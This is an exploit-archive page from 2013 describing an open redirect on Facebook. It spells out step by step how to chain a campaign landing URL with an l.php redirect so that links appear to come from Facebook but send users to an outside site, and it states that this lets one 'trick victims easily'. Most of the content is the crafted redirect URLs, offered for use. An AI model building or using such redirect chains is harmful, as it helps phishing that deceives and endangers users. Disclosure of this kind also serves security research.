Facebook Open Redirection

2013.11.19

Credit: The Black Devils

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-601

# Exploit Title: Facebook URL open Redirection
# Date: 05/11/2013 - 01/01/1435
# Exploit Author: The Black Devils " Asesino04"
# Vendor Homepage: http://www.facebook.com/
# Tested on: Mozilla firefox
------------------------------------------------
First let's talk about redirection in facebook when you send a link to someone in facebook chat or post
facebook create a security token for every single link , so your link must be like that so you can rediect
http://www.facebook.com/l.php?u=attackersite.com&h=security token
using this exploit you wont need security token and you can trick victimes easily
------------------------------------------------
# You go this page
https://developers.facebook.com/docs/android/
and you copy the link of "download sdk"
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://developers.facebook.com/resources/facebook-android-sdk-current.zip
# you keep only this
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=
# then you add to it
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
#so it became like that :
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Facebook Open Redirection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.